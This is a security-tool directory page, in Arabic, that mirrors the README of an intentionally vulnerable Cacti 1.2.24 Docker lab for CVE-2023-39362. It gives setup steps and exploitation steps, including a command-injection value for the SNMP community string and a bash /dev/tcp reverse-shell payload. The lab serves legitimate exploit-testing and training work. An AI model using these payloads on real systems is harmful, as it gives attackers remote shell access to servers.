Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cacti-rce-snmp-options-vulnerable-application — تحذير: هذا تطبيق ضعيف لاختبار استغلال ثغرة حقن الأوامر في Cacti (CVE-2023-39362). قم بتشغيله على مسؤوليتك الخاصة! | Kitploit
أدوات/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةالتعلم والتعليممختبرات وتدريب عملي
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

تحذير: هذا تطبيق ضعيف لاختبار استغلال ثغرة حقن الأوامر في Cacti (CVE-2023-39362). قم بتشغيله على مسؤوليتك الخاصة!

عرض المستودعالموقع الإلكتروني
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Cacti v1.2.24 authenticated command injection (CVE-2023-39362) vulnerable application

هذا تطبيق ضعيف لاختبار استغلال ثغرة Cacti (CVE-2023-39362).

تحذير!

يحتوي هذا التطبيق على ثغرات أمنية خطيرة. قم بتشغيله على مسؤوليتك الخاصة! يُوصى باستخدام بيئة مدعومة ومحمية (مثل جهاز افتراضي بلقطة حديثة وشبكة مخصصة للمضيف فقط). لا تقم بتحميل هذا التطبيق إلى أي خوادم موجهة للإنترنت، لأنها ستتعرض للاختراق.

إخلاء مسؤولية: لا أتحمل المسؤولية عن الطريقة التي يستخدم بها أي شخص هذا التطبيق. الغرض الوحيد من هذا التطبيق هو أن يكون سيناريو اختبار لاستغلال CVE-2023-39362 ولا ينبغي استخدامه بشكل ضار. إذا تم اختراق خادمك عبر تثبيت هذا التطبيق، فهذه ليست مسؤوليتي، بل مسؤولية الشخص (أو الأشخاص) الذين قاموا بتحميله وتثبيته.

معلومات الثغرة

  • CVE-ID: CVE-2023-39362
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • الوصف: في Cacti 1.2.24، في ظل ظروف معينة، يمكن لمستخدم متميز مصادق استخدام سلسلة ضارة في خيارات SNMP لجهاز، مما يؤدي إلى حقن أوامر والحصول على تنفيذ تعليمات برمجية عن بعد على الخادم الأساسي.

الاستخدام

فيما يلي خطوات إعداد البيئة:

  1. قم بتشغيل docker compose up -d لبدء التشكيل.
  • يمكنك إنهاء الخطوات بتصفح http://127.0.0.1/cacti لبدء معالج تهيئة Cacti. إذا حصلت على خطأ يشير إلى قاعدة البيانات، فقط انتظر قليلاً وقم بتحديث الصفحة.
  • بيانات الاعتماد الافتراضية هي admin/admin.
  • اضغط على "التالي" لجميع الأزرار أثناء المعالج، مع اختيار الخيارات وفقًا لذلك. يجب أن تكون جميع الإعدادات الافتراضية جيدة ويجب أن تكون جميع المتطلبات الإلزامية مستوفاة.
  • بعد التثبيت، قم بتسجيل الدخول باسم admin.
  • اذهب إلى "Console" > "Configuration" > "User".
  • انقر على المستخدم guest.
  • قم بتمكينه، وضبط كلمة مرور، وقم بتعطيل "يجب تغيير كلمة المرور عند تسجيل الدخول التالي" إذا أردت.
  • انقر على زر "حفظ".
  • اذهب إلى قسم "الأذونات".
  • تحت "الإدارة العامة"، قم بتمكين "الوصول إلى لوحة التحكم" و "المواقع/الأجهزة/البيانات".
  • انقر على زر "حفظ".
  • سجل الخروج ثم سجل الدخول مرة أخرى باسم guest لتجربة الاستغلال.
  • سيتم تسمية الحاوية vuln-cacti.

    اسم المضيف لجهاز SNMP الاختباري هو monitored_snmp_device.

    لـ إزالة البيئة استخدم الأمر docker compose down.

    يمكن العثور على دليل التثبيت الرسمي لـ Cacti هنا.

    السبب الجذري

    يتوفر سبب جذري مفصل للثغرة في التقرير الأمني الأصلي أو في منشور مدونتي.

    الاستغلال

    (هذا مجرد استغلال واحد محتمل)

    1. اذهب إلى "Console" > "Create" > "New Device".
    2. أنشئ جهازًا يدعم SNMP الإصدار 1 أو 2.
    3. تأكد من أن الجهاز يحتوي على رسوم بيانية باستخدام قالب واحد أو أكثر من:
      • "Net-SNMP - Combined SCSI Disk Bytes"
      • "Net-SNMP - Combined SCSI Disk I/O"
      • (إنشاء الجهاز من القالب "Net-SNMP Device" سيلبي شرط الرسوم البيانية)
    4. في "SNMP Options"، لحقل "SNMP Community String"، استخدم قيمة مثل هذه: public\' ; touch /tmp/m3ssap0 ; \'.
    5. انقر على زر "إنشاء".
    6. تحقق من وجود الملف الذي تم إنشاؤه تحت /tmp.

    للحصول على شل عكسي، يمكن استخدام حمولة مثل التالية.

    root@kitploit:~
    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
    

    المؤلفون

    • Antonio Francesco Sardella - مبلغ الثغرة - m3ssap0

    الترخيص

    هذا المشروع مرخص بموجب Unlicense - راجع ملف LICENSE للحصول على التفاصيل.

    تنزيل الأداة